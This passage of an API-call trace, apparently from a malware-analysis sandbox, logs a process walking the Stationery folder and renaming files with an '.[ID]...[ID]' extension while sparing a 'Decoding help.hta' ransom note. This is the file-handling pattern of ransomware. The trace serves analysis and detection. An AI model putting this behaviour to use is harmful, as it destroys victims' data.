Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.063] lstrcmpiW (lpString1="Decoding help.hta", lpString2="SoftBlue.jpg") returned -1 [0053.063] lstrlenW (lpString="SoftBlue.jpg") returned 12 [0053.063] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.063] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.063] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="SoftBlue.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" [0053.063] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" [0053.063] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0053.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.172] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce1c836a, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0053.172] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.172] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.172] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.172] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.172] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Stars.htm") returned -1 [0053.172] lstrlenW (lpString="Stars.htm") returned 9 [0053.172] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.172] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.173] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Stars.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" [0053.173] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" [0053.173] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0053.173] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.173] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce4037dd, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce4037dd, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa5ffafd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0053.173] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.173] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.173] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.173] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Stars.jpg") returned -1 [0053.173] lstrlenW (lpString="Stars.jpg") returned 9 [0053.173] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.173] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.173] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Stars.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" [0053.173] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" [0053.173] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0053.173] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.186] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54403c2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54403c2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x452797c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x748, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stucco.gif", cAlternateFileName="")) returned 1 [0053.187] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.187] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.187] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Stucco.gif") returned -1 [0053.187] lstrlenW (lpString="Stucco.gif") returned 10 [0053.187] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.187] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Stucco.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" [0053.187] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" [0053.187] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0053.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.187] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc548c67c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc548c67c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4529f927, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tanspecks.jpg", cAlternateFileName="")) returned 1 [0053.187] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.187] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.187] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Tanspecks.jpg") returned -1 [0053.187] lstrlenW (lpString="Tanspecks.jpg") returned 13 [0053.188] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.188] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.188] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Tanspecks.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" [0053.188] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" [0053.188] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0053.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.188] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54b27d9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54b27d9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4573c389, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x121e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tiki.gif", cAlternateFileName="")) returned 1 [0053.188] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.188] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.188] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.188] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Tiki.gif") returned -1 [0053.188] lstrlenW (lpString="Tiki.gif") returned 8 [0053.188] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.188] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.188] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Tiki.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" [0053.188] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" [0053.188] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0053.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.189] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc535bb94, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc535bb94, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4573c389, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x6860, dwReserved0=0x0, dwReserved1=0x0, cFileName="To_Do_List.emf", cAlternateFileName="")) returned 1 [0053.189] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.189] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.189] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.189] lstrcmpiW (lpString1="Decoding help.hta", lpString2="To_Do_List.emf") returned -1 [0053.189] lstrlenW (lpString="To_Do_List.emf") returned 14 [0053.189] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.189] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="To_Do_List.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf" [0053.189] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf" [0053.189] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0053.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.189] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fea93, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc54fea93, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457ae7a3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc60, dwReserved0=0x0, dwReserved1=0x0, cFileName="White_Chocolate.jpg", cAlternateFileName="")) returned 1 [0053.189] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.189] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.189] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.189] lstrcmpiW (lpString1="Decoding help.hta", lpString2="White_Chocolate.jpg") returned -1 [0053.189] lstrlenW (lpString="White_Chocolate.jpg") returned 19 [0053.190] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.190] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.190] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="White_Chocolate.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" [0053.190] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg") 